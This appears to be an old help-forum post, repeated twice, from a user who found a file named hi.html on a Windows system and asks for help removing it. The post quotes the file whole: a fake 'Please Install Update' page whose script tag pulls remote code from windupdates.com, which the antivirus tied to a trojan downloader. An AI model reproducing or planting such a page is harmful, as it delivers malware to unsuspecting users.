J
John Hull
Hi, I seem to have a strange file resident on my system: C:\WINDOWS\hi.html
The content is:
------------------------------------
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Pop Up...</title>
<font color="#0000FF">Please Install
Update.....</head></font><body></body></html>
<!-- AUTO PROMPT START -->
<script language="javascript" type="text/javascript"
src="http://public.windupdates.com/promp...9fd95f6638&k=e331c7c7cf5988756be0eaf2fe4f185d"></script>
<script language="javascript" type="text/javascript">self.focus();</script>
<!-- AUTO PROMPT END -->
</head>
-------------------------------------
I have NOD32 v2.12.1 (virus signature database: 1.868) installed on my
system. It does not detect this file.
What has been happening is that hi.html has somehow been executed a number
of times by my system (how I do not know).
Now to investigate what this file is, i personally executed hi.html myself,
and Nod32 picked up on the following:
----------
Archive:
http://static.windupdates.com/cab/DownloadsUnlimited/ie/bridge-c6.cab
Virus:
Win32/TrojanDownloader.Small.NAS trojan
----------
Can anyone tell me what I should do? I have run a full scan on NOD32 and
nothing shows.
One interesting thing i have noticed is that when i have NOD32 AMON
antivirus monitor showing, and i start up a browser session, i can see that
AMON is checking the hi.html file. This might be because I have previously
executed the hi.html. But i fail to understand why it checks hi.html when i
try and start up a new browser session.
I have since renamed hi.html. I don't want to just simply delete it as it
might be linked to something else. I want all links removed. I want to find
out how this file was downloaded to my system in the first place.
Any help appreciated!
Peter
The content is:
------------------------------------
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Pop Up...</title>
<font color="#0000FF">Please Install
Update.....</head></font><body></body></html>
<!-- AUTO PROMPT START -->
<script language="javascript" type="text/javascript"
src="http://public.windupdates.com/promp...9fd95f6638&k=e331c7c7cf5988756be0eaf2fe4f185d"></script>
<script language="javascript" type="text/javascript">self.focus();</script>
<!-- AUTO PROMPT END -->
</head>
-------------------------------------
I have NOD32 v2.12.1 (virus signature database: 1.868) installed on my
system. It does not detect this file.
What has been happening is that hi.html has somehow been executed a number
of times by my system (how I do not know).
Now to investigate what this file is, i personally executed hi.html myself,
and Nod32 picked up on the following:
----------
Archive:
http://static.windupdates.com/cab/DownloadsUnlimited/ie/bridge-c6.cab
Virus:
Win32/TrojanDownloader.Small.NAS trojan
----------
Can anyone tell me what I should do? I have run a full scan on NOD32 and
nothing shows.
One interesting thing i have noticed is that when i have NOD32 AMON
antivirus monitor showing, and i start up a browser session, i can see that
AMON is checking the hi.html file. This might be because I have previously
executed the hi.html. But i fail to understand why it checks hi.html when i
try and start up a new browser session.
I have since renamed hi.html. I don't want to just simply delete it as it
might be linked to something else. I want all links removed. I want to find
out how this file was downloaded to my system in the first place.
Any help appreciated!
Peter